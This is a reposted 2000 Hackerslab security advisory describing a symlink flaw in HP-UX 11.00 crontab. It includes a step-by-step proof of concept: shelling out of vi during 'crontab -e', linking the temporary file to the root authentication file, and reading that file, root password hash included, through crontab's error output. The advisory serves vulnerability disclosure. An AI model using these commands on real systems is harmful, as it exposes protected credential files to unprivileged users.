Advisories : HP-UX crontab temporary file symbolic link vulnerability

main menu

- feedback
- advertising
- privacy
- FightAIDS
- newsletter
- news

discussions

- read forum
- new topic
- search

meetings

- meetings list
- recent additions
- add your info

top 100 sites

- visit top sites
- sign up now
- members

webmasters

- add your url
- add domain
- search box
- link to us

projects

- our projects
- free email

m4d network

- security software
- secureroot
- m4d.com

Home : Advisories : HP-UX crontab temporary file symbolic link vulnerability

Title:	HP-UX crontab temporary file symbolic link vulnerability
Released by:	Hackerslab
Date:	23rd October 2000
Printable version:	Click here

============================================================================

====



     [ Hackerslab bug_paper ] HP-UX crontab temporary file symbolic link

vulnerability



============================================================================

====







File   :   /usr/bin/crontab



SYSTEM :   HP-UX



           Tested in  HP-UX 11.00





INFO :



There is a vulneribility in "crontab" which allows users to read all files

without attaining root or file ownership privileges.







The "crontab" command can't be run by any user in general however, users

that are registered in crontab.allow are permitted to run the command.









Using the crontab command with the -e option (crontab -e) excutes vi editor

and a temporary file is created in /var/tmp/ . The owner of the file is a

current user.









Make a subshell by using !sh command in vi and link the file created in

/var/tmp/ then exit crontab. Then the error message appears with all the

file names and details.



Example) display the contents of /tcb/files/auth/r/root



$ id

uid=101(dubhe) gid=101(swat)

$uname -s -r

HP-UX B.11.00







$ crontab -e

...

...

~

"/var/tmp/aaaa25923"



### A file named  /var/tmp/aaaa25923 is created



~

:!sh



### Make a subshell



$ ln -sf /tcb/files/auth/r/root /var/tmp/aaaa25923

$ exit



### Make symlink and return vi



[Hit return to continue]

:q!



### Quit vi



root:u_name=root:u_id#0:\

crontab: error on previous line; unexpected character found in line.

        :u_pwd=Of2wgf6SCoIbQ:\

crontab: error on previous line; unexpected character found in line.

        :u_bootauth:u_auditid#0:\

crontab: error on previous line; unexpected character found in line.

        :u_auditflag#1:\

crontab: error on previous line; unexpected character found in line.

        :u_pswduser=root:u_suclog#972084495:u_unsuclog#972084492:u_lock@:\

crontab: error on previous line; unexpected character found in line.

        :chkent:

crontab: error on previous line; unexpected character found in line.





==--------------------------------------------------------------------------

-----==

       ********

   *    **   **    *

 *      **   **      *

*       ******       *

 *      **   **      *

dubhe@hackerslab.org     [Kyong-won, Cho]

   *    **   **    *                                    [

http://www.hackerslab.org ]

       ********            HACKERSLAB (C)  since 1999

==--------------------------------------------------------------------------

-----==